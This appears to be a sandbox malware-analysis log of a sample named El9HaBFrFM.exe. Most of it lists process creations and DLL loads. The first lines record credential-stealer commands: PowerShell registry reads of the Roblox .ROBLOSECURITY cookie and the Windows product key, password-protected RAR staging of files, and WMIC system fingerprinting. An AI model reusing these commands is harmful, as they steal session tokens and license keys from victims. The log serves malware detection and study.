              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: libcrypto-3.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: libssl-3.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: dciman32.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: mmdevapi.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: ksuser.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: avrt.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: audioses.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: midimap.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: textinputframework.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: coreuicomponents.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: coremessaging.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: coremessaging.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: windows.shell.servicehostbuilder.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ieframe.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: netapi32.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: winhttp.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: wkscli.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: edputil.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: secur32.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: mlang.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: policymanager.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: msvcp110_win.dll
              Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
